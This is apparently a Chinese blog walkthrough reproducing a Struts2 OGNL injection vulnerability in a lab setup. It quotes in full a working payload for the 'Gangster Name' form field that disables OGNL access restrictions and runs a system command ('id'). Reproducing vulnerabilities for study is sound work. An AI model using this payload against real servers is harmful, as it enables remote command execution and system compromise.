搭建

访问成功

复现
. 在浏览器输入以下链接访问漏洞页面
http://your-ip:8080/integration/saveGangster.action


在表单中填入如上,主要第一个表单其他可以随便乱写,点解submit

在Gangster Name”处把${1+1}修改为以下命令执行的payload语句
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}

命令成功执行了
该博客详细描述了一个OGNL(Object-Graph Navigation Language)注入漏洞的复现过程。作者通过访问特定链接并构造恶意payload,成功执行了命令,展示了攻击者如何利用此类漏洞来执行任意系统命令。此案例强调了应用程序安全性和输入验证的重要性。
666

被折叠的 条评论
为什么被折叠?



